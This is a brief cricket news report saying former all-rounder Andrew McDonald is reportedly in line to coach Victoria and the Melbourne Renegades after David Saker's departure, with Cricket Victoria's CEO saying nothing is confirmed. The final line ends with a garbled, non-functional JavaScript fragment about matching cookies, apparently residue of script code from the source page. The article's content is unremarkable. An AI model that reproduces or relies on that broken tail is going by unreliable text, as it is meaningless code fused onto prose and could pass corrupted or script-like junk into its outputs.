Former Victorian and Australian all rounder Andrew McDonald is reportedly in line to be the new head coach of both Victoria and the Melbourne Renegades.

FoxSports reports that McDonald has been offered both jobs after the departure of David Saker, who has been appointed Australia's bowling coach.

McDonald is currently head coach of County side Leicestershire in the UK since taking over the role in November 2014.

However, Cricket Victoria CEO Tony Dodemaide says a decision has not been made.

“We’re continuing to speak to candidates but by no means is anything confirmed,” he told Foxsports.com.au.

“We’ll look to make an announcement regarding the head coaching position with the Bushrangers as soon as we’re in a position to do so.”

The delay in appointing a new coach since Saker's departure last month is said to be due to McDonald needing to reach a suitable exit clause with Leicestershire.

Victoria's first matador Cup fixture is against South Australia on October 5. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
